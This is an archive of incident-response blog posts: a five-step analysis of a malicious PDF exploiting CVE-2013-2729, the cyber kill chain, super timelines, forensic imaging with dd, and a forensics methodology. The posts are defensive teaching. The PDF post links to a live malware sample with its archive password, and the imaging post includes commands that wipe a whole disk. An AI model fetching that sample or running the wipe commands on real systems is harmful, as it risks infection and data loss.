Author Archives: Luis Rocha

Malicious Documents – PDF Analysis in 5 steps

tojan-pdf

Mass mailing or targeted campaigns that use common files to host or exploit code have been and are a very popular vector of attack. In other words, a malicious PDF or MS Office document received via e-mail or opened trough a browser plug-in. In regards to malicious PDF files the security industry saw a significant increase of vulnerabilities after the second half of 2008 which might be related to Adobe Systems release of the specifications, format structure and functionality of PDF files.

Most enterprise networks perimeters are protected and contain several security filters and mechanism that block threats. However, a malicious PDF or MS Office document might be very successful passing trough Firewalls, Intrusion Prevention Systems, Anti-spam, Anti-virus and other security controls. By reaching the victim mailbox, this attack vector will leverage social engineering techniques to lure the user to click/open the document. Then, for example, If the user opens a PDF malicious file, it typically executes JavaScript that exploits a vulnerability when Adobe Reader parses the crafted file. This might cause the application to corrupt memory on the stack or heap causing it to run arbitrary code known as shellcode. This shellcode normally downloads and executes a malicious file from the Internet. The Internet Storm Center Handler Bojan Zdrnja wrote a good summary about one of these shellcodes.  In some circumstances the vulnerability could be exploited without opening the file and just by having a malicious file on the hard drive as described by Didier Stevens.

From a 100 feet view a PDF file is composed by a header , body, reference table and trailer. One key component is the body which might contains all kinds of content type objects that make parsing attractive for vulnerability researchers and exploit developers. The language is very rich and complex which means the same information can be encoded and obfuscated in many ways. For example, within objects there are streams that can be used to store data of any type of size. These streams are compressed and the PDF standard supports several algorithms including ASCIIHexDecode, ASCI85Decode, LZWDecode, FlateDecode, RunLengthDecode, CCITTFaxDecode, DCTCDecode called Filters. PDF files can contain multimedia content and support JavaScript and ActionScript trough Flash objects. Usage of JavaScript is a popular vector of attack because it can be hidden in the streams using different techniques making detection harder. In case the PDF file contains JavaScript, the malicious code is used to trigger a vulnerability and to execute shellcode. All this features and capabilities are translated in a huge attack surface!

From a security incident response perspective the knowledge about how to do a detailed analysis of such malicious files can be quite useful. When analyzing this kind of files an incident handler can determine the worst it can do, its capabilities and key characteristics. Furthermore, it can help to be better prepared and identify future security incidents and how to contain, eradicate and recover from those threats.

So, which steps could an incident handler or malware analyst perform to analyze such files?

In case of a malicious PDF files there are 5 steps. By using REMnux distro the steps are described by  Lenny Zeltser as being:

  1. Find and Extract Javascript
  2. Deobfuscate Javascript
  3. Extract the shellcode
  4. Create a shellcode executable
  5. Analyze shellcode and determine what is does.

A summary of tools and techniques using REMnux to analyze malicious documents are described in the cheat sheet compiled by Lenny, Didier and others. In order to practice these skills and to illustrate an introduction to the tools and techniques, below is the analysis of a malicious PDF using these steps.

The other day I received one of those emails that was part of a mass mailing campaign. The email contained an attachment with a malicious PDF file that took advantage of Adobe Reader Javascript engine to exploit CVE-2013-2729. This vulnerability found by Felipe Manzano exploits an integer overflow in several versions of the Adobe Reader when parsing BMP files compressed with RLE8 encoded in PDF forms. The file on Virus Total was only detected by 6 of the 55 AV engines. Let’s go through each one of the mentioned steps to find information on the malicious PDF key characteristics and its capabilities.

1st Step – Find and extract JavaScript

One technique is using Didier Stevens suite of tools to analyze the content of the PDF and look for suspicious elements. One of those tools is Pdfid which can show several keywords used in PDF files that could be used to exploit vulnerabilities. The previously mentioned cheat sheet contain some of these keywords. In this case the first observations shows the PDF file contains 6 objects and 2 streams. No JavaScript mentioned but it contains /AcroForm and /XFA elements. This means the PDF file contains XFA forms which might indicate it is malicious.

mal-pdf-step1-img1

 

Then looking deeper we can use pdf-parser.py to display the contents of the 6 objects. The output was reduced for the sake of brevity but in this case the Object 2 is the /XFA element that is referencing to Object 1 which contains a stream compressed and rather suspicious.

mal-pdf-step1-img2

Following this indicator pdf-parser.py allows us to show the contents of an object and pass the stream trough one of the supporter filters (FlateDecode, ASCIIHexDecode, ASCII85Decode, LZWDecode and RunLengthDecode only) trough the –filter switch. The –raw switch allows to show the output in a easier way to read. The output of the command is redirected to a file. Looking at the contents of this file we get the decompressed stream. When inspecting this file you will see several lines of JavaScript that weren’t on the original PDF file. If this document is opened by a victim the /XFA keyword will execute this malicious code.

mal-pdf-step1-img3

Another fast method to find if the PDF file contains JavaScript and other malicious elements is to use the peepdf.py tool written by Jose Miguel Esparza. Peepdf is a tool to analyze PDF files, helping to show objects/streams, encode/decode streams, modify all of them, obtain different versions, show and modify metadata, execution of Javascript and shellcodes. When running the malicious PDF file against the last version of the tool it can show very useful information about the PDF structure, its contents and even detect which vulnerability it triggers in case it has a signature for it.

mal-pdf-step1-img4

2nd Step – Deobfuscate  Javascript

The second step is to deobfuscate the JavaScript. JavaScript can contain several layers of obfuscation. in this case there was quite some manual cleanup in the extracted code just to get the code isolated. The object.raw contained 4 JavaScript elements between <script xxxx contentType=”application/x-javascript”> tags and 1 image in base64 format in <image> tag.  This JavaScript code between tags needs to be extracted and place into a separated file. The same can be done for the chunk of base64 data, when decoded will produce a 67Mb BMP file.  The JavaScript in this case was rather cryptic but there are tools and techniques that help do the job in order to interpret and execute the code.  In this case I used another tool called js-didier.pl which is a Didier version of the JavaScript interpreter SpiderMonkey. It is essentially a JavaScript interpreter without the browser plugins that you can run from the command line. This allows to run and analyze malicious JavaScript in a safe and controlled manner. The js-didier tool, just like SpiderMonkey, will execute the code and prints the result into files named eval.00x.log.  I got some errors on one of the variables due to the manual cleanup but was enough to produce several eval log files with interesting results.

mal-pdf-step2-img1

3rd Step – Extract the shellcode

The third step is to extract the shellcode from the deobfuscated JavaScript. In this case the eval.005.log file contained the deobfuscated JavaScript. The file among other things contains 2 variables encoded as Unicode strings. This is one trick used to hide or obfuscate shellcode. Typically you find shellcode in JavaScript encoded in this way.

mal-pdf-step3-img1

These Unicode encoded strings need to be converted into binary. To perform this isolate the Unicode encoded strings into a separated file and convert it the Unicode (\u) to hex (\x) notation. To do this you need using a series of Perl regular expressions using a Remnux script called unicode2hex-escaped. The resulting file will contain the shellcode in a hex format (“\xeb\x06\x00\x00..”) that will be used in the next step to convert it into a binary

mal-pdf-step3-img2

 

4th Step – Create a shellcode executable

Next with the shellcode encoded in hexadecimal format we can produce a Windows binary that runs the shellcode. This is achieved using a script called shellcode2exe.py written by Mario Vilas and later tweaked by Anand Sastry. As Lenny states ” The shellcode2exe.py script accepts shellcode encoded as a string or as raw binary data, and produces an executable that can run that shellcode. You load the resulting executable file into a debugger to examine its. This approach is useful for analyzing shellcode that’s difficult to understand without stepping through it with a debugger.”

mal-pdf-step4-img1

 

5th Step – Analyze shellcode and determine what is does.

Final step is to determine what the shellcode does. To analyze the shellcode you could use a dissasembler or a debugger. In this case the a static analysis of the shellcode using the strings command shows several API calls used by the shellcode. Further also shows a URL pointing to an executable that will be downloaded if this shellcode gets executed

mal-pdf-step5-img1

 

We now have a strong IOC that can be used to take additional steps in order to hunt for evil and defend the networks. This URL can be used as evidence and to identify if machines have been compromised and attempted to download the malicious executable. At the time of this analysis the file was no longer there but its known to be a variant of the Game Over Zeus malware.

The steps followed are manual but with practice they are repeatable. They just represent a short introduction to the multifaceted world of analyzing malicious documents. Many other techniques and tools exist and much deeper analysis can be done. The focus was to demonstrate the 5 Steps that can be used as a framework to discover indicators of compromise that will reveal machines that have been compromised by the same bad guys. However using these 5 steps many other questions could be answered.  Using the mentioned and other tools and techniques within the 5 steps we can have a better practical understanding on how malicious documents work and which methods are used by Evil.  Two great resource for this type of analysis is the Malware Analyst’s Cookbook : Tools and Techniques for Fighting Malicious Code book from Michael Ligh and the SANS FOR610: Reverse-Engineering Malware: Malware Analysis Tools and Technique authored by Lenny Zeltser.

Download link for the malicious PDF file: https://0x0.st/sZyY.zip . MD5: 4f275c936b0772c969b2daf4688b7fc9
Password: infected

Tagged , , , , , ,

Intelligence driven Incident Response

killchainBack in March 2011, Eric Hutchins, Michael Cloppert and Dr. Rohan Amin from Lockheed Martin (US Gov defense contractor) released a paper named Intelligence Driven Computer Network Defense Informed by Analysis of Adversary Campaigns and Intrusion Kill Chains. This was a great contribution to the IT security community because it describes a novel way to deal with intrusions. They claim that current tools and models that deal with intrusions need to evolve mainly due to two things. First network defense tools focus on the vulnerability component of the risk instead of the threat. Second the traditional way of doing incident response happens after a successful intrusion.  To solve this problem they propose a model that leverages an understanding about the tools and techniques used by the attackers creating intelligence that is then used to decrease the likelihood success of an intrusion.  In order to understanding the threat actors , their tools and techniques they adopted models and terms that have origins in the US military. Essentially they propose to maps the steps taken by attackers during an intrusion. These steps are then intersected with a chain of events with the goal to detect, mitigate and respond to intrusions based on the knowledge of the threat using indicators, patterns and behaviors that are conducted during the course of action of the intrusion.

To map the attackers activity the authors propose an intelligence gathering element called indicator that is divided in three types:

  • Atomic – Atomic indicators are attributes relevant in the context of the intrusion and cannot be further divided into smaller parts. Examples include IP addresses, email addresses, DNS names.
  • Computed – Computed indicators are digital representation of data pertinent to the intrusion or patterns indentified with regular expressions. Examples include hashes from malicious files,  regular expressions used on IDS.
  • Behavioral – Behavioral indicators are a combination of atomic and computed indicators trough some kind of logic that outline a summary of the attackers tools and techniques. An example is well described by Mike Cloppert: “Bad guy 1 likes to use IP addresses in West Hackistan to relay email through East Hackistan and target our sales folks with trojaned word documents that discuss our upcoming benefits enrollment, which drops backdoors that communicate to A.B.C.D.’ Here we see a combination of computed indicators (Geolocation of IP addresses, MS Word attachments determined by magic number, base64 encoded in email attachments) , behaviors (targets sales force), and atomic indicators (A.B.C.D C2)”

The phases to map the attacker activity are based on US DoD information operations doctrine with its origins in the field manual 100-6 from the Department of the Army. This systematic process evolved over the years and is also described in the Air Force Doctrine Document 2-1.9 8 June 2006 as kill chain and referred in military language as dynamic targeting process F2T2EA (Find, Fix, Track, Target, Engage, and Assess) or F3EAD (Find, Fix, Finish, Exploit, Analyze and Disseminate). The authors expanded this concept and presented a new kill chain model to deal with intrusions. The 7 phases of the cyber kill chain are:

  • Reconnaissance : Research, identification and selection of targets, often represented as crawling Internet websites such as conference proceedings and mailing lists for email addresses, social relationships, or information on specific technologies.
  •  Weaponization : Coupling a remote access trojan with an exploit into a deliverable payload, typically by means of an automated tool (weaponizer). Increasingly, client applications data files such as Adobe PDF or Microsoft Office documents serve as the weaponized deliverable.
  •  Delivery : Transmission of the weapon to the targeted environment using vectors like email attachments, websites, and USB removable media.
  •  Exploitation : After the weapon is delivered to victim host, exploitation triggers intruders’ code. Most often, exploitation targets an application or operating system vulnerability, but it could also more simple exploit the users themselves or leverage an operating system feature that auto-executes.
  •  Installation : Installation of a remote access trojan or backdoor on the victim system allows the adversary to maintain persistence inside the environment.
  •  Command and Control (C2) : Typically, compromised hosts must beacon outbound to an Internet controller server to establish a C2 channel.
  •  Actions on Objectives : Only now, after progressing through the first six phases, can intruders take actions to achieve their original objectives. Typically this objective is data exfiltration which involves collecting, encrypting and extracting information from the victim environment. Alternatively, the intruders may only desire access to the initial victim box for use as a hop point to compromise additional systems and move laterally inside the network.

Then these steps are used to produce a course of action matrix that is modeled against a system that is used, once again, in military language as offensive information operations with the aim to  detect, deny, disrupt, degrade, deceive and destroy. The goal is to create a plan that degrades the attacker ability to perform his steps and forcing him to be reactive by interfering with the chain of events. This will slow the attackers movements, disrupt their decision cycles and will increase the costs to be successful.  The following picture taken from the original paper illustrates the course of action matrix.

courseofaction

 

This model is a novel way to deal with intrusions by moving from the traditional reactive way to a more proactive system based on intelligence gathered trough indicators that are observed trough out the phases. Normally the incident response process starts after the exploit phase putting defenders in a disadvantage position. With this method defenders should be able to move their actions and analysis up to the kill chain and interfere with the attackers actions. The authors  go even further to a more strategic level by stating that intruders reuse tools and infrastructure and they can be profiled based on the indicators. By leveraging this intelligence defenders can analyze and map multiple intrusion kill chains over time and understanding commonalties and overlapping indicators. This will result in a structural way to analyze intrusions. By repeating this process one can characterize intruders activity by determine the tactics, techniques and procedures on how the attackers operate i.e., perform a campaign analysis.

References and Further reading:

Mike Cloppert series of posts on security intelligence on the SANS Forensics Blog

Lockheed Martin Cyber Kill Chain

Sean Mason from GE on Incident Response

Tagged , , ,

Hands on Training to develop cyber security skills

abstractThe demand for qualified security professionals who possess the required skills and relevant education is increasing substantially. However, the supply is not meeting the demand. The information security industry is growing in size, density and specialization. Across all businesses we need people who understand computer systems, networks and security. In order to help facilitate the growth of these information security skills hands-on training (H.O.T.) can be used to make sure that our abilities have been tested in the most realistic way possible This paper will show how to build an environment that will represent real-world security issues and their respective flaws. Topics such as incident handling, intrusion analysis, system administration, network security, forensics or penetration testing can be taught and practiced. Among other objectives, the primary goal is to grow security expertise and awareness by using a low-cost, high return and self paced hands-on training method to allow us to understand attack methods in order to create effective defenses.

This is the abstract of my paper that was just released on the SANS reading room as part of my journey to get the GIAC GCIH gold certification. I started drafting the idea of writing a paper last October.  The experience was interesting, sometimes frustrating, long but with lots of fun. Essentially, I prepared all my ideas in the lab and practiced the different scenarios I wanted to share so they could be repeatable and consistent in order to be documented. In parallel I started to write some notes, do research and find references.  Around last December I submitted the first draft to SANS. They accepted the paper and assigned an advisor to work with me.  From that moment onwards I had a deadline of 6 months. It followed a series of back and forth with the advisor. I must admit that Dr. Johannes Ulrich from SANS was very supportive, responsive and  a great mentor during the all process.  I also would like to thank to Angel Parrizas for his constructive feedback during the paper creation and thoughts on the structure, Michael Bem for his help with the opening language, Grzegorz Drozda in the beginning with his SQL kung-fu and, finally, my family that had a lot of patience to deal with the long hours of computer.

My biggest challenge was the language in terms of structure, phrasing, diction, subject-verb agreement, and tense since English is a second language for me. I believe to create a paper like this you need strong motivation, willingness, persistence and family support but it is a rewarding experience and allowed me to share my experiences, learn, reinforce my knowledge and contribute to the community. I definitely recommend this exercise to anyone who is involved in the security industry.

The paper is available here!

Tagged ,

Forensics Evidence Processing – Super Timeline

After evidence acquisition, you normally start your forensics analysis and investigation by doing a timeline analysis. This is a crucial step and very useful because it includes information on when files were modified, accessed, changed and created in a human readable format, known as MAC time evidence. This activity helps finding the particular time an event took place and in which order. The traditional timeline analysis is done to the file system and has been used for several years and folks like Rob Lee and others have been championing it for years. The data is gathered using a variety of tools and is extracted from the metadata layer of the file system (inode on Linux or MFT records on Windows) and then parsed and sorted in order to be analyzed. The end goal is to generate a snapshot of the activity done in the system including its date, the artifact involved, action and source. The creation is an easy process but the interpretation is hard. During the interpretation it helps to be meticulous and patience and it facilitates if you have comprehensive file systems and operating system artifacts knowledge. To accomplish this step several commercial or open source tools exists such as the SANS Investigate Forensic Toolkit (SIFT) that is freely available and frequently updated.

In June 2010, the SANS reading room published a paper from Kristinn Gudjonsson as part of his GCFA gold certification introducing a new method called super timeline and a tool called log2timeline. The super timeline goes beyond the traditional file system timeline creation based on metadata extracted from acquired images by extending it with more sources of data in an automated fashion. As stated on Kristinn paper the super timeline includes more artifacts that provide vital information to the investigation. Basically the super timeline is a timeline of timelines that are gathered from the file system, registry keys and windows artifacts producing a single correlated timeline. To create the super timeline, Kristinn originally developed a framework that is materialized in the log2timeline tool written in Perl. The tool uses a modular approach that makes easier for someone to contribute to the project by developing a new module. A new module could be for example a new parser for a specific windows artifact. The first release  introduced several parsers for windows artifacts such as the ability to create time stamped data of Chrome, Firefox, Opera and Internet Explorer browser history, Mcafee Antivirus log file, Open XML used in the Microsoft Office documents metadata, PDF metadata, pcap network captures, UserAssist registry key and others. The log2timeline has been actively developed by Kristinn and others and its backend is currently being replaced by a new framework named Plaso that still contains the log2timeline tool as a frontend and other many other tools written in Python.

In order to practice the production of a super timeline I created a realistic scenario that consists of a Windows XP system that has been compromised by w32/Morto worm just by having remote desktop service exposed to the internet with poor administrator password. Moments after being compromised the machine was taken offline and a forensic image bit-by-bit was created.  The image was then moved to the SIFT workstation for analysis.

5 steps are needed to create the super timeline using the SIFT workstation and the logt2timeline.py front-end tool from the plaso suite.

supertimeline

 

Now with the evidence sorted and reduced I can start doing my analysis, investigation and looks for signs of Evil using for example Excel. An piece of the super timeline is showed in the following picture.

supertimeline-csv

 

The creation of a super timeline is an easy process and it applies to different windows operating systems but the interpretation is hard.  During the interpretation it helps to be meticulous and patience and it facilitates if you have comprehensive file systems, operating system artifacts and registry knowledge. With these type of methodology one can practice and improve their ability to determine past actions which have taken place and understand all kinds of artifacts which occur within the super timeline. On the SANS website there is another great article on how to create a super timeline with log2timeline. Here you can also view a 2011 webcast that looks at what is and how to do super timeline analysis. These and other steps to create a super timeline are well detailed in the log2timeline cheat sheet created by David Nides. The analysis and investigation will be part of other post.

Tagged , , , ,

Evidence acquisition – Creating a forensic image

helix-shotFollowing the identification phase of the incident handling process, where among others you have identified malicious acts or deviations from the normal operation. It comes the containment phase.  During the containment phase you want to stop the damage. Stop the bleeding and pause the attacker in the most quick and effective manner without changing evidence and using a low profile approach. There isn’t a silver bullet on how to do containment because every case is unique however there are some strategies that you can use. Some examples of short term containment include disconnecting the network cable, redirecting the impacted system DNS name to another IP address, creating a firewall rule or if your infrastructure allows put the system into a separated isolated vlan. During this process engage the business owners and decide the best approach.  Do not gracefully shutdown the system because it will destroy important evidence, artifacts and you will lose all your volatile data.

There are times that the incident handler is also gathering evidence to deliver to the forensics team or the incident handler also does the forensics analysis. Depending on the case you might be working, you might see an overlap between incident handling and forensics but the processes and procedures go hand in hand. From a forensics perspective do a forensics image of the affected system. This means gathering the file system using a disk imaging process and a memory dump (volatile data).  You should start by gathering the volatile data, then you do a disk image. With these elements you can do a thoroughly analysis of the data. During the forensics data analysis, among other things, you will look at the file system at bit level, analyzing several artifacts such as program execution, files download,  file opening and creation, usb and drive usage, account usage, browser usage, etc.

Create a forensic image of the disk as soon as is practical. Make sure you use blank media in a pristine state to create a copy of the impacted system. This blank media e.g, usb hard drive, should be wiped. You clean and prepare the drive during the preparation phase. You do not want to be wiping drives while going under fire!  To do the disk image you should do a bit-by-bit image using your preferred toolkit. Don’t use the tools from the compromised system because you cannot trust them.  Use binaries from a another source. One example is the linux based toolkit Helix that brings the dd tool built in that will assist you doing the forensic image of the hard drive – Helix product went commercial but you can still download the free 2009R3 version – .  Once you created the image and ensure its integrity, is good practice to record the time and the evidence creation method including the image hash on your incident handler notebook. If times allow create more than one image. Most of the times you don’t have time because a image creation can take several hours to execute. In such case you do a duplicate offsite and then you do your analysis using the duplicate. Image creation is a simple task but you need to practice it.

To do the image creation of the hard drives the traditional way is to remove the hard drive from the impacted system and create a forensic image using a write block. But other times this method is not practical. Another way of making a forensic image of the hard drive is to use live acquisition methods, boot disk acquisition or using remote/enterprise grade tools.  A live system acquisition might be useful in cases the affected drive is encrypted or you have a RAID across multiple drives or is not feasible to power down the machine. However, this method will only grab the logical part of the hard drive i.e. partitions such as FAT, NTFS, EXT2, etc.

The other method is using a bootable forensic distro such as Helix. You need to reboot the system and boot the system using CD/USB. This allows to create a bit-by-bit image of the physical drive, the evidence on the drive is not altered during boot process and you can create an image of the hard drive into a image file. This image file can then be used across different analysis tools and is easier to backup.

Let’s look at an hands-on scenario to create a forensic image using a bootable disk method from a compromised or suspicious system using dd. Dd is simple and flexible tool that is launched using the command line and is available for Windows and Linux. In this case we will run dd in a Linux system. What dd does is only copying chunks of raw data from one input source to an output destination. It does not know nothing about partitions or file systems. dd reads from its input source into blocks (512 bytes of data by default) specified by the if= suffix. It then writes the data to an output destination using the of= suffix.

We start by using dd to prepare a target hard drive. We will wipe the data of an hard drive that we will be using to gather the evidence. We will use dd to zeroize an 320Gb USB drive. This will render the drive sterile and into a pristine state. Plug the USB drive into a Linux system and execute fdisk -lu to display available drives on the system. In this case we have 2 drives. One is the /dev/sda which is the internal hard drive of the system and the /dev/sdb which is the 320Gb drive that we plugged into the system. The /dev/sdb does not contain any valid partitions and this is ok for now because we only want to wipe it.

root@ubuntu:~# fdisk -lu
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders, total 312581808 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x0006784f
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048      206847      102400    7  HPFS/NTFS
Partition 1 does not end on cylinder boundary.
/dev/sda2          206848   312578047   156185600    7  HPFS/NTFS
 
Disk /dev/sdb: 320.0 GB, 320072933376 bytes
255 heads, 63 sectors/track, 38913 cylinders, total 625142448 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x00000000
Disk /dev/sdb doesn't contain a valid partition table

Next execute dd specifying as input the special file /dev/zero and the /dev/sdb as the output drive by using a block size of 8k to increase the speed of the process. This will create zeros across the entire drive. Be careful with this command and make sure you are wiping the right drive. On our system this process took more than 3 hours to complete.

root@ubuntu:~# dd if=/dev/zero of=/dev/sdb bs=8k
dd: writing `/dev/sdb': No space left on device
39071404+0 records in
39071403+0 records out
320072933376 bytes (320 GB) copied, 11579.9 s, 27.6 MB/s

 

The “No space left on device” error is normal. Also note that the number of records in and out multiplied by the block size (8192) will get you the number of bytes copied.

To confirm that the drive has been zeroized you can dump the contents using xxd.

root@ubuntu:~# cat /dev/sdb | xxd | more
0000000: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000010: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  ................
0000040: 0000 0000 0000 0000 0000 0000 0000 0000  ................

 

We have now prepared our media for the acquisition process. Now that we have pristine media we can do our forensic image. Boot the Helix CD on the target/compromised system and  plug the USB media. Then create a EXT2 file system using fdisk and mke2fs.

root@ubuntu:~# fdisk /dev/sdb
Device contains neither a valid DOS partition table, nor Sun, SGI or OSF disklabel
Building a new DOS disklabel with disk identifier 0x7b441f7a.
Changes will remain in memory only, until you decide to write them.
After that, of course, the previous content won't be recoverable.
The number of cylinders for this disk is set to 38913.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
   (e.g., DOS FDISK, OS/2 FDISK)
Warning: invalid flag 0x0000 of partition table 4 will be corrected by w(rite)
Command (m for help): m
Command action
   a   toggle a bootable flag
   b   edit bsd disklabel
   c   toggle the dos compatibility flag
   d   delete a partition
   l   list known partition types
   m   print this menu
   n   add a new partition
   o   create a new empty DOS partition table
   p   print the partition table
   q   quit without saving changes
   s   create a new empty Sun disklabel
   t   change a partition's system id
   u   change display/entry units
   v   verify the partition table
   w   write table to disk and exit
   x   extra functionality (experts only) 
Command (m for help): p
Disk /dev/sdb: 320.0 GB, 320072933376 bytes
255 heads, 63 sectors/track, 38913 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
Disk identifier: 0x7b441f7a
   Device Boot      Start         End      Blocks   Id  System
Command (m for help): n
Command action
   e   extended
   p   primary partition (1-4) p
 
Partition number (1-4): 1
First cylinder (1-38913, default 1):
Using default value 1
Last cylinder or +size or +sizeM or +sizeK (1-38913, default 38913):
Using default value 38913
Command (m for help): w
The partition table has been altered!
Calling ioctl() to re-read partition table.
Syncing disks.
 
root@ubuntu:~# mke2fs /dev/sdb1
 
mke2fs 1.40.8 (13-Mar-2008)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
19537920 inodes, 78142160 blocks
3907108 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=0
2385 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups stored on blocks:
       32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
       4096000, 7962624, 11239424, 20480000, 23887872, 71663616
Writing inode tables: done                           
Writing superblocks and filesystem accounting information: done
This filesystem will be automatically checked every 25 mounts or
180 days, whichever comes first.  Use tune2fs -c or -i to override.
 
root@ubuntu:~# fdisk -lu
 
Disk /dev/sda: 160.0 GB, 160041885696 bytes
255 heads, 63 sectors/track, 19457 cylinders, total 312581808 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x0006784f
   Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *        2048      206847      102400    7  HPFS/NTFS
Partition 1 does not end on cylinder boundary.
/dev/sda2          206848   312578047   156185600    7  HPFS/NTFS
 
Disk /dev/sdb: 320.0 GB, 320072933376 bytes
255 heads, 63 sectors/track, 38913 cylinders, total 625142448 sectors
Units = sectors of 1 * 512 = 512 bytes
Disk identifier: 0x7b441f7a
   Device Boot      Start         End      Blocks   Id  System
/dev/sdb1              63   625137344   312568641   83  Linux

 

The fdisk created a partition that used the entire disk and the mk2fs created the file system (note the command run on /dev/sdb1). Finally with the fdisk -lu you could confirm that the partition was formated using with an EXT2. The next step is mount the file system by creating a mount point and then mounting the partition.

root@ubuntu:~# mkdir /mnt/target
root@ubuntu:~# mount /dev/sdb1 /mnt/target

Then we are ready to start our bit-by-bit image creation. This method will gather the allocated space, unallocated space and slack space, bad blocks. This means will grab the all the sectors from the hard drive from the MBR to the final sector including the Host Protected Area (HPA) if it exists.

Start by creating a cryptographic fingerprint of the original disk using MD5. This will be used to verify the integrity of the duplicate. Then using dd with the input source being the /dev/sda and the output file a file named suspect.img. Other usefull options is the conv=sync,noerror to avoid stopping the image creation when founding an unreadable sector. If such sector is found with this option, it will skip over the unreadable section (noerror) and pad the output (sync). Finally create the fingerprint of the image created and verify that both fingerprints match and unmount the drive.

root@ubuntu:~# md5sum /dev/sda > /mnt/target/suspect.md5
root@ubuntu:~#dd if=/dev/sda of=/mnt/target/suspect.img conv=sync,noerror bs=8k
19536363+0 records in
19536363+0 records out
160041885696 bytes (160 GB) copied, 5669.92 s, 28.2 MB/s
root@ubuntu:~#md5sum /mnt/target/suspect.img > /mnt/target/suspect.img.md5
root@ubuntu:~# cat /mnt/target/*.md5
6a5346b9425925ed230e32c9a0b510f7  /mnt/target/suspect.img
6a5346b9425925ed230e32c9a0b510f7  /dev/sda
root@ubuntu:~# umount /mnt/target/

The creation of the image is a simple process but you should practice it. Under fire is much harder to accomplish these type of activity.  Also it is a process that can take several hours to accomplish. In our case took around 90m. The integrity checking took around the same time.  With these steps we created a forensically sound image of an hard drive in a bit-by-bit manner and we ensured its integrity.

Now that we collected a forensic image we could start our forensics investigation by doing an in-depth analysis of the file system and analyzing several artifacts such as program execution, files download,  file opening and creation, usb and drive usage, account usage, browser usage, etc.  To do this we could use the SANS Investigative Forensic Toolkit (SIFT) and start practicing tools and techniques to discover evidence and tracks about the suspect. During our investigation we might want to gather data to answer questions such as:

How did the attacker gain entry?
What is the latest evidence of attacker activity?
What actions did the attacker execute on the system?
How did the attacker maintained access to the environment?
What tools has the attacker deployed?
What accounts did the attacker compromise?

 

References:

SANS Forensics 508 – Advanced Computer Forensic Analysis and Incident Response

Tagged , , ,

Computer Forensics and Investigation Methodology – 8 steps

sans-siftAccepted methods and procedures to properly seize, safeguard, analyze data and determine what happen. Actionable information to deal with computer forensic cases. Repeatable and effective steps. It’s a good way to describe the SANS methodology for IT Forensic investigations compelled by Rob Lee and many others. It is an 8 steps methodology. It will help the investigator to stay on track and assure proper presentation of computer evidence for criminal or civil case into court, legal proceedings and internal disciplinary actions, handling of malware incidents and unusual operational problems. Furthermore, is a good starting point in order to have a reasonable knowledge of forensic principles, guidelines, procedures, tools and techniques.

The purpose of these 8 steps is to respond systematically to forensic investigations and determine what happen. A similar process exists and was created by NIST on the Guide to Integrating Forensic Techniques into Incident Response  (pub. #: 800-86) published in 2006. This special publication is consistent with SANS methodology and reflect the same basic principles, differing on the granularity of each phase or terms used. Other similar methodologies are described in the ISO-27041.

Also is important to consider that a computer forensic investigation goes hand in hand with computer incident handling and is normally a break-off point of the containment phase.

Below a short and high level introduction of the 8 Computer Forensic Investigation steps:

Verification: Normally the computer forensics investigation will be done as part of an incident response scenario, as such the first step should be to verify that an incident has taken place. Determine the breadth and scope of the incident, assess the case. What is the situation, the nature of the case and its specifics. This preliminary step is important because will help determining the characteristics of the incident and defining the best approach to identify, preserve and collect evidence. It might also help justify to business owners to take a system offline.

System Description: Then it follows the step where you start gathering data about the specific incident. Starting by taking notes and describing the system you are going to analyze, where is the system being acquired, what is the system role in the organization and in the network. Outline the operating system and its general configuration such as disk format, amount of RAM and the location of the evidence.

Evidence Acquisition: Identify possible sources of data, acquire volatile and non-volatile data, verify the integrity of the data and ensure chain of custody. When in doubt of what to collect be on the safe side and is better to rather collect too much than not. During this step is also important that you prioritize your evidence collection and engage the business owners to determine the execution and business impact of chosen strategies. Because volatile data changes over time, the order in which data is collected is important. One suggested order in which volatile data should be acquired is network connections, ARP cache, login sessions, running processes, open files and the contents of RAM and other pertinent data – please note that all this data should be collected using trusted binaries and not the ones from the impacted system. After collecting this volatile data you go into the next step of collecting non-volatile data such as the hard drive. To gather data from the hard drive depending on the case there are normally three strategies to do a bit stream image: using a hardware device like a write blocker in case you can take the system offline and remove the hard drive ; using an incident response and forensic toolkit such as Helix that will be used to boot the system ; using live system acquisition (locally or remotely) that might be used when dealing with encrypted systems or systems that cannot be taken offline or only accessible remotely.  After acquiring data, ensure and verify its integrity. You should also be able to clearly describe how the evidence was found, how it was handled and everything that happened to it i.e. chain of custody.

Note that as part of your investigation and analysis the following steps work in a loop where you can jump from one into another in order to find footprints and tracks left by Evil. If you get stuck, don’t give up!

Timeline Analysis: After the evidence acquisition you will start doing your investigation and analysis in your forensics lab. Start by doing a timeline analysis. This is a crucial step and very useful because it includes information such as when files were modified, accessed, changed and created in a human readable format, known as MAC time evidence. The data is gathered using a variety of tools and is extracted from the metadata layer of the file system (inode on Linux or MFT records on Windows) and then parsed and sorted in order to be analyzed. Timelines of memory artifacts can also be very useful in reconstructing what happen. The end goal is to generate a snapshot of the activity done in the system including its date, the artifact involved, action and source. The creation is an easy process but the interpretation is hard. During the interpretation it helps to be meticulous and patience and it facilitates if you have comprehensive file systems and operating system artifacts knowledge. To accomplish this step several commercial or open source tools exists such as the SIFT Workstation that is freely available and frequently updated.

